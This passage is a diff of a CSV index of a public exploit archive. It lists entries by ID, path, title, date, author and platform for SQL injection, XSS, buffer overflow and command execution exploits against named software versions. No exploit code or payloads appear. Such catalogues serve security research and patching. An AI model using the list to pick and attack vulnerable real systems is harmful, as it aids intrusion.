Remote Buffer Overflow Vulnerability",2005-03-08,"Mehrtash Mallahzadeh",windows,remote,0 25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 BBCode IMG Tag Script Injection Vulnerability",2005-03-08,FireSt0rm,php,webapps,0 @@ -22393,7 +22433,7 @@ id,file,description,date,author,platform,type,port 25290,platforms/linux/local/25290.c,"Linux Kernel 2.4.x/2.6.x Bluetooth Signed Buffer Index Vulnerability (4)",2005-10-24,qobaiashi,linux,local,0 25291,platforms/multiple/remote/25291.txt,"Tincat Network Library Remote Buffer Overflow Vulnerability",2005-03-28,"Luigi Auriemma",multiple,remote,0 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 -25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",2013-05-07,metasploit,windows,remote,0 +25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80 25295,platforms/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos,0 25296,platforms/windows/local/25296.rb,"AudioCoder .M3U Buffer Overflow",2013-05-07,metasploit,windows,local,0 25297,platforms/linux/remote/25297.txt,"Dovecot with Exim sender_address Parameter - Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0 @@ -22405,6 +22445,9 @@ id,file,description,date,author,platform,type,port 25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client Env_opt_add Heap-Based Buffer Overflow Vulnerability",2005-03-28,"Gael Delalleau",linux,dos,0 25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0 25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure Exploit",2013-05-08,HTP,multiple,webapps,0 +33406,platforms/php/webapps/33406.txt,"Horde <= 3.3.5 Administration Interface admin/phpshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33407,platforms/php/webapps/33407.txt,"Horde <= 3.3.5 Administration Interface admin/cmdshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33408,platforms/php/webapps/33408.txt,"Horde <= 3.3.5 Administration Interface admin/sqlshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 showgallery.php Multiple Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0 25309,platforms/php/webapps/25309.txt,"PhotoPost Pro 5.1 showmembers.php Multiple Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0 25310,platforms/php/webapps/25310.txt,"PhotoPost Pro 5.1 slideshow.php photo Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0 @@ -22506,7 +22549,7 @@ id,file,description,date,author,platform,type,port 25406,platforms/linux/local/25406.sh,"Kloxo 6.1.6 - Local Privilege Escalation",2013-05-13,HTP,linux,local,0 25408,platforms/windows/dos/25408.pl,"Windows Media Player 11.0.0 - (.wav) Crash PoC",2013-05-13,Asesino04,windows,dos,0 25409,platforms/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilties",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 -25410,platforms/php/webapps/25410.txt,"Joomla S5 Clan Roster com_s5clanroster (index.php, id param) - SQL Injection",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 +25410,platforms/php/webapps/25410.txt,"Joomla S5 Clan Roster com_s5clanroster (index.php id param) - SQL Injection",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 25411,platforms/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",linux,local,0 25412,platforms/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0 25413,platforms/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0 @@ -22538,7 +22581,7 @@ id,file,description,date,author,platform,type,port 25439,platforms/multiple/dos/25439.c,"Multiple Vendor TCP Session Acknowledgement Number Denial of Service Vulnerability",2004-12-13,"Antonio M. D. S. Fortes",multiple,dos,0 25440,platforms/php/webapps/25440.txt,"Wordpress wp-FileManager - Arbitrary File Download Vulnerability",2013-05-14,ByEge,php,webapps,0 25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0 -25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php, id param) SQL Injection Vulnerability",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 +25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php id param) SQL Injection Vulnerability",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25443,platforms/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow Vulnerability (SEH)",2013-05-14,ariarat,windows,dos,0 25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.37 <= 3.x.x - PERF_EVENTS Local Root Exploit",2013-05-14,sd,linux,local,0 25445,platforms/multiple/remote/25445.rb,"SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",2013-05-14,metasploit,multiple,remote,8000 @@ -22579,8 +22622,8 @@ id,file,description,date,author,platform,type,port 25481,platforms/asp/webapps/25481.txt,"DUportal Pro 3.4 detail.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25482,platforms/asp/webapps/25482.txt,"DUportal 3.1.2 channel.asp iChannel Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25483,platforms/asp/webapps/25483.txt,"DUportal 3.1.2 inc_poll_voting.asp DAT_PARENT Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25484,platforms/asp/webapps/25484.txt,"DUportal 3.1.2 inc_rating.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25485,platforms/asp/webapps/25485.txt,"DUportal 3.1.2 type.asp iCat Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 +25484,platforms/asp/webapps/25484.txt,"DUportal 3.1.2 inc_rating.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25486,platforms/windows/remote/25486.txt,"RaidenFTPD 2.4 Unauthorized File Access Vulnerability",2005-04-21,"Lachlan. H",windows,remote,0 25487,platforms/windows/remote/25487.txt,"yawcam 0.2.5 - Directory Traversal Vulnerability",2005-04-21,"Donato Ferrante",windows,remote,0 25488,platforms/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 Username Cross-Site Scripting Vulnerability",2005-04-21,Lostmon,php,webapps,0 @@ -22676,6 +22719,7 @@ id,file,description,date,author,platform,type,port 25578,platforms/php/webapps/25578.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 product_details.php category_id Parameter XSS",2005-05-02,Lostmon,php,webapps,0 25579,platforms/php/webapps/25579.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 products.php Multiple Parameter XSS",2005-05-02,Lostmon,php,webapps,0 25580,platforms/php/webapps/25580.txt,"CodetoSell ViArt Shop Enterprise 2.1.6 news_view.php Multiple Parameter XSS",2005-05-02,Lostmon,php,webapps,0 +25720,platforms/php/webapps/25720.txt,"Vanilla Forums 2.0.18.8 - Multiple Vulnerabilities",2013-05-26,"Henry Hoggard",php,webapps,0 25584,platforms/multiple/dos/25584.txt,"Mtp-Target Server 1.2.2 Memory Corruption Vulnerability",2005-05-02,"Luigi Auriemma",multiple,dos,0 25585,platforms/asp/webapps/25585.txt,"MaxWebPortal 1.3 dl_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 25586,platforms/asp/webapps/25586.txt,"MaxWebPortal 1.3 links_popular.asp SQL Injection",2005-05-02,s-dalili,asp,webapps,0 @@ -22703,6 +22747,13 @@ id,file,description,date,author,platform,type,port 25608,platforms/hardware/remote/25608.rb,"Linksys WRT160nv2 - apply.cgi Remote Command Injection",2013-05-21,metasploit,hardware,remote,80 25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h OS Command Injection",2013-05-21,metasploit,hardware,remote,80 25611,platforms/windows/dos/25611.txt,"Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos,0 +30092,platforms/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 Parameter Multiple Remote File Include Vulnerabilities",2007-05-28,"Hasadya Raed",php,webapps,0 +25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 ASCII File Extension File Filter Circumvention Vulnerability",2005-06-14,d.schroeter@gmx.de,linux,remote,0 +25821,platforms/php/webapps/25821.txt,"Annuaire 1Two 1.0/1.1 Index.PHP Cross-Site Scripting Vulnerability",2005-06-14,An0nym0uS,php,webapps,0 +25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure Vulnerability",2005-06-15,"Sverre H. Huseby",windows,remote,0 +25823,platforms/php/webapps/25823.txt,"McGallery 1.0/1.1 Lang Argument File Disclosure Vulnerability",2005-06-15,D_BuG,php,webapps,0 +25824,platforms/php/webapps/25824.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - Multiple Input Validation Vulnerabilities",2005-06-15,"GulfTech Security",php,webapps,0 +25825,platforms/php/webapps/25825.txt,"Ultimate PHP Board 1.8/1.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,"Alberto Trivero",php,webapps,0 25612,platforms/php/webapps/25612.txt,"myBloggie 2.1 index.php year Parameter XSS",2005-05-05,"Alberto Trivero",php,webapps,0 25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g Database Fine Grained Audit Logging Failure Vulnerability",2005-05-05,"Alexander Kornbrust",multiple,remote,0 25614,platforms/php/webapps/25614.txt,"MidiCart PHP Search_List.PHP SearchString Parameter SQL Injection Vulnerability",2005-05-05,Exoduks,php,webapps,0 @@ -22788,6 +22839,7 @@ id,file,description,date,author,platform,type,port 25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 results.stm indexname XSS",2005-05-24,"Jamie Fisher",windows,remote,0 25695,platforms/windows/remote/25695.txt,"Sambar Server 5.x/6.0/6.1 logout RCredirect XSS",2005-05-24,"Jamie Fisher",windows,remote,0 25696,platforms/windows/remote/25696.txt,"Sambar Server 5.x/6.0/6.1 Server Referer XSS",2005-05-24,"Jamie Fisher",windows,remote,0 +25766,platforms/php/webapps/25766.txt,"Qualiteam X-Cart 4.0.8 giftcert.php Multiple Parameter XSS",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25697,platforms/windows/remote/25697.txt,"Blue Coat Reporter 7.0/7.1 - Remote Privilege Escalation Vulnerability",2005-05-24,"Oliver Karow",windows,remote,0 25698,platforms/windows/remote/25698.txt,"Blue Coat Reporter 7.0/7.1 License HTML Injection Vulnerability",2005-05-24,"Oliver Karow",windows,remote,0 25699,platforms/windows/dos/25699.txt,"Gearbox Software Halo Game Server 1.06/1.07 Infinite Loop Denial of Service Vulnerability",2005-05-24,"Luigi Auriemma",windows,dos,0 @@ -22807,15 +22859,14 @@ id,file,description,date,author,platform,type,port 25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE",2013-05-26,rgod,windows,remote,0 25714,platforms/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack-Based Overflow",2013-05-26,LiquidWorm,windows,dos,0 25715,platforms/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps,0 -25716,platforms/php/webapps/25716.py,"AVE.CMS <= 2.09 (index.php, module param) - Blind SQL Injection Exploit",2013-05-26,mr.pr0n,php,webapps,0 +25716,platforms/php/webapps/25716.py,"AVE.CMS <= 2.09 (index.php module param) - Blind SQL Injection Exploit",2013-05-26,mr.pr0n,php,webapps,0 25718,platforms/hardware/local/25718.txt,"Sony Playstation 3 (PS3) 4.31 - Save Game Preview SFO File Handling Local Command Execution",2013-05-26,Vulnerability-Lab,hardware,local,0 25719,platforms/windows/dos/25719.txt,"Trend Micro DirectPass 1.5.0.1060 - Multiple Software Vulnerabilities",2013-05-26,Vulnerability-Lab,windows,dos,0 -25720,platforms/php/webapps/25720.txt,"Vanilla Forums 2.0.18.8 - Multiple Vulnerabilities",2013-05-26,"Henry Hoggard",php,webapps,0 25721,platforms/php/webapps/25721.txt,"Wordpress User Role Editor Plugin 3.12 - CSRF Vulnerability",2013-05-26,"Henry Hoggard",php,webapps,0 25723,platforms/php/webapps/25723.txt,"Wordpress Spider Event Calendar Plugin 1.3.0 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 25724,platforms/php/webapps/25724.txt,"Wordpress Spider Catalog Plugin 1.4.6 - Multiple Vulnerabilities",2013-05-26,waraxe,php,webapps,0 25725,platforms/windows/local/25725.rb,"AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass",2013-05-26,metasploit,windows,local,0 -25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 (menager.php, playlist_id param) - SQL Injection Vulnerability",2013-05-26,Rooster(XEKA),php,webapps,0 +25726,platforms/php/webapps/25726.txt,"RadioCMS 2.2 (menager.php playlist_id param) - SQL Injection Vulnerability",2013-05-26,Rooster(XEKA),php,webapps,0 25727,platforms/php/webapps/25727.txt,"BookReview 1.0 add_review.htm Multiple Parameter XSS",2005-05-26,Lostmon,php,webapps,0 25728,platforms/php/webapps/25728.txt,"BookReview 1.0 add_contents.htm Multiple Parameter XSS",2005-05-26,Lostmon,php,webapps,0 25729,platforms/php/webapps/25729.txt,"BookReview 1.0 suggest_category.htm node Parameter XSS",2005-05-26,Lostmon,php,webapps,0 @@ -22855,7 +22906,6 @@ id,file,description,date,author,platform,type,port 25763,platforms/php/webapps/25763.txt,"Qualiteam X-Cart 4.0.8 orders.php mode Parameter XSS",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25764,platforms/php/webapps/25764.txt,"Qualiteam X-Cart 4.0.8 register.php mode Parameter XSS",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25765,platforms/php/webapps/25765.txt,"Qualiteam X-Cart 4.0.8 - search.php mode Parameter XSS",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25766,platforms/php/webapps/25766.txt,"Qualiteam X-Cart 4.0.8 giftcert.php Multiple Parameter XSS",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25767,platforms/php/webapps/25767.txt,"Qualiteam X-Cart 4.0.8 home.php Multiple Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25768,platforms/php/webapps/25768.txt,"Qualiteam X-Cart 4.0.8 product.php Multiple Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25769,platforms/php/webapps/25769.txt,"Qualiteam X-Cart 4.0.8 error_message.php id Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 @@ -22864,7 +22914,22 @@ id,file,description,date,author,platform,type,port 25772,platforms/php/webapps/25772.txt,"Qualiteam X-Cart 4.0.8 register.php mode Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25773,platforms/php/webapps/25773.txt,"Qualiteam X-Cart 4.0.8 - search.php mode Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25774,platforms/php/webapps/25774.txt,"Qualiteam X-Cart 4.0.8 giftcert.php Multiple Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 -25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80 +25819,platforms/php/webapps/25819.txt,"FusionBB 0.x - Multiple Input Validation Vulnerabilities",2005-06-13,"James Bercegay",php,webapps,0 +33411,platforms/php/webapps/33411.txt,"iSupport 1.8 ticket_function.php Multiple Parameter XSS",2009-12-16,"Stink and Essandre",php,webapps,0 +33412,platforms/php/webapps/33412.txt,"iSupport 1.8 index.php which Parameter XSS",2009-12-16,"Stink and Essandre",php,webapps,0 +33413,platforms/php/webapps/33413.txt,"Pluxml-Blog 4.2 - 'core/admin/auth.php' Cross-Site Scripting Vulnerability",2009-12-17,Metropolis,php,webapps,0 +33414,platforms/php/remote/33414.php,"PHP <= 5.2.11 - 'htmlspecialcharacters()' Malformed Multibyte Character Cross-Site Scripting Vulnerability (1)",2009-12-17,hello@iwamot.com,php,remote,0 +33415,platforms/php/remote/33415.php,"PHP <= 5.2.11 - 'htmlspecialcharacters()' Malformed Multibyte Character Cross-Site Scripting Vulnerability (2)",2009-12-17,hello@iwamot.com,php,remote,0 +33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x - 'lang' Parameter Local File Include Vulnerability",2009-12-17,"Juan Galiana Lara",php,webapps,0 +33417,platforms/php/webapps/33417.txt,"cPanel 11.x - 'fileop' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps,0 +33418,platforms/php/webapps/33418.txt,"Joomla! 'com_joomportfolio' Component - 'secid' Parameter SQL Injection Vulnerability",2009-12-17,"Fl0riX and Snakespc",php,webapps,0 +33419,platforms/php/webapps/33419.txt,"F3Site 2009 mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 +33420,platforms/php/webapps/33420.txt,"F3Site 2009 mod/new.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 +33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injection Vulnerabilities",2009-12-18,R3d-D3V!L,php,webapps,0 +33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0 +33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0 +33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite Multiple Cross-Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0 +33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory DRAPERI",php,webapps,80 25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 IncDir Remote File Include Vulnerability",2005-05-31,"SoulBlack Group",php,webapps,0 25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0 25779,platforms/php/webapps/25779.txt,"MyBB - Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2005-05-31,"Alberto Trivero",php,webapps,0 @@ -22904,16 +22969,6 @@ id,file,description,date,author,platform,type,port 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",2013-05-29,metasploit,windows,remote,0 25815,platforms/hardware/webapps/25815.txt,"Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 -25816,platforms/php/webapps/25816.txt,"Ovidentia FX Remote File Include Vulnerability",2005-06-10,Status-x,php,webapps,0 -25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 Jammail.pl Remote Arbitrary Command Execution Vulnerability",2005-06-12,blahplok,cgi,webapps,0 -25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 beta Image Gallery Index.PHP Cross-Site Scripting Vulnerability",2005-06-13,TheGreatOne2176,php,webapps,0 -25819,platforms/php/webapps/25819.txt,"FusionBB 0.x - Multiple Input Validation Vulnerabilities",2005-06-13,"James Bercegay",php,webapps,0 -25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 ASCII File Extension File Filter Circumvention Vulnerability",2005-06-14,d.schroeter@gmx.de,linux,remote,0 -25821,platforms/php/webapps/25821.txt,"Annuaire 1Two 1.0/1.1 Index.PHP Cross-Site Scripting Vulnerability",2005-06-14,An0nym0uS,php,webapps,0 -25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0, Adobe Reader 7.0 File Existence and Disclosure Vulnerability",2005-06-15,"Sverre H. Huseby",windows,remote,0 -25823,platforms/php/webapps/25823.txt,"McGallery 1.0/1.1 Lang Argument File Disclosure Vulnerability",2005-06-15,D_BuG,php,webapps,0 -25824,platforms/php/webapps/25824.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - Multiple Input Validation Vulnerabilities",2005-06-15,"GulfTech Security",php,webapps,0 -25825,platforms/php/webapps/25825.txt,"Ultimate PHP Board 1.8/1.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,"Alberto Trivero",php,webapps,0 25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 browse.php show_course Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 contact.php subject Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 content.php cid Parameter XSS",2005-06-16,Lostmon,php,webapps,0 @@ -22937,7 +22992,11 @@ id,file,description,date,author,platform,type,port 25846,platforms/php/webapps/25846.txt,"cPanel <= 9.1 User Parameter Cross-Site Scripting Vulnerability",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 25847,platforms/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart LOGIN.ASP SQL Injection Vulnerability",2003-12-07,G00db0y,asp,webapps,0 25848,platforms/php/webapps/25848.pl,"PAFaq beta4 Database Unauthorized Access Vulnerability",2005-06-20,james,php,webapps,0 -25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation(newvalue,field) Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 +25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation(newvalue_field) Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 +26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net Multiple Scripts Arbitrary Remote Command Execution Vulnerabilities",2005-08-21,sullo@cirt.net,cgi,webapps,0 +26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 Perldiver.CGI Cross-Site Scripting Vulnerability",2005-08-21,"Donnie Werner",cgi,webapps,0 +26291,platforms/asp/webapps/26291.txt,"Mall23 AddItem.ASP SQL Injection Vulnerability",2005-08-21,SmOk3,asp,webapps,0 +26292,platforms/osx/dos/26292.html,"Microsoft Internet Explorer 5.2.3 for Mac OS Denial of Service Vulnerability",2005-08-22,"Mella Marco",osx,dos,0 25851,platforms/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow",2013-05-31,metasploit,windows,remote,8001 25852,platforms/multiple/dos/25852.py,"ModSecurity Remote Null Pointer Dereference",2013-05-31,"Younes JAAIDI",multiple,dos,0 25853,platforms/asp/webapps/25853.txt,"I-Gallery Folder Argument Directory Traversal Vulnerability",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 @@ -22971,6 +23030,7 @@ id,file,description,date,author,platform,type,port 25881,platforms/php/webapps/25881.txt,"CarLine Forum Russian Board 4.2 set.php name_ig_array[] Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 25882,platforms/php/webapps/25882.txt,"CarLine Forum Russian Board 4.2 reply.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 25883,platforms/windows/local/25883.txt,"BOINC Manager (Seti@home) 7.0.64 Field SEH based BOF",2013-06-02,xis_one,windows,local,0 +26288,platforms/linux/remote/26288.txt,"Mozilla Browser/Firefox - Arbitrary Command Execution Vulnerability",2005-09-20,"eter Zelezny",linux,remote,0 25884,platforms/php/webapps/25884.txt,"CarLine Forum Russian Board 4.2 new.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 25885,platforms/php/webapps/25885.txt,"CarLine Forum Russian Board 4.2 edit_msg.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 25886,platforms/php/webapps/25886.txt,"CarLine Forum Russian Board 4.2 menu_header.php table_sql Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 @@ -23003,16 +23063,18 @@ id,file,description,date,author,platform,type,port 25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0 25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0 +25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.PHP Remote Command Execution Variant Vulnerability",2005-07-01,"Alberto Trivero",php,webapps,0 +25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0 +25949,platforms/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x Spoofed SIP Status Message Handling Weakness",2005-07-06,DrFrancky,hardware,remote,0 25918,platforms/cgi/webapps/25918.txt,"CGI-Club imTRBBS 1.0 - Remote Command Execution Vulnerability",2005-06-29,blahplok,cgi,webapps,0 25919,platforms/php/webapps/25919.txt,"Phorum 5.0.11 Read.PHP SQL Injection Vulnerability",2004-10-24,"Positive Technologies",php,webapps,0 25920,platforms/cgi/webapps/25920.pl,"Community Link Pro Login.CGI File Parameter Remote Command Execution Vulnerability",2005-06-29,spher3,cgi,webapps,0 25921,platforms/windows/dos/25921.txt,"Raven Software Soldier Of Fortune 2 Ignore Command Remote Denial of Service Vulnerability",2005-06-29,"Luigi Auriemma",windows,dos,0 25922,platforms/asp/webapps/25922.txt,"CyberStrong EShop 4.2 20review.ASP SQL Injection Vulnerability",2005-06-30,aresu@bosen.net,asp,webapps,0 25923,platforms/asp/webapps/25923.txt,"CyberStrong eShop 4.2 10expand.ASP SQL Injection Vulnerability",2005-06-30,aresu@bosen.net,asp,webapps,0 +25926,platforms/php/webapps/25926.txt,"OSTicket 1.2/1.3 view.php inc Variable Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 25924,platforms/asp/webapps/25924.txt,"fsboard 2.0 - Directory Traversal Vulnerability",2005-06-30,ActualMInd,asp,webapps,0 25925,platforms/asp/webapps/25925.txt,"CyberStrong EShop 4.2 10browse.ASP SQL Injection Vulnerability",2005-06-30,aresu@bosen.net,asp,webapps,0 -25926,platforms/php/webapps/25926.txt,"OSTicket 1.2/1.3 view.php inc Variable Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 -25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.PHP Remote Command Execution Variant Vulnerability",2005-07-01,"Alberto Trivero",php,webapps,0 25928,platforms/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x calendar.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25929,platforms/php/webapps/25929.txt,"EasyPHPCalendar 6.1.5/6.2.x popup.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25930,platforms/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x header.inc.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 @@ -23033,8 +23095,6 @@ id,file,description,date,author,platform,type,port 25945,platforms/php/webapps/25945.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Index.PHP Directory Traversal Vulnerability",2005-07-06,"Diabolic Crab",php,webapps,0 25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0 25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite Vulnerability",2005-07-06,pi3ki31ny,linux,local,0 -25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0 -25949,platforms/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x Spoofed SIP Status Message Handling Weakness",2005-07-06,DrFrancky,hardware,remote,0 25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 Plug-In Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0 25951,platforms/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",php,webapps,0 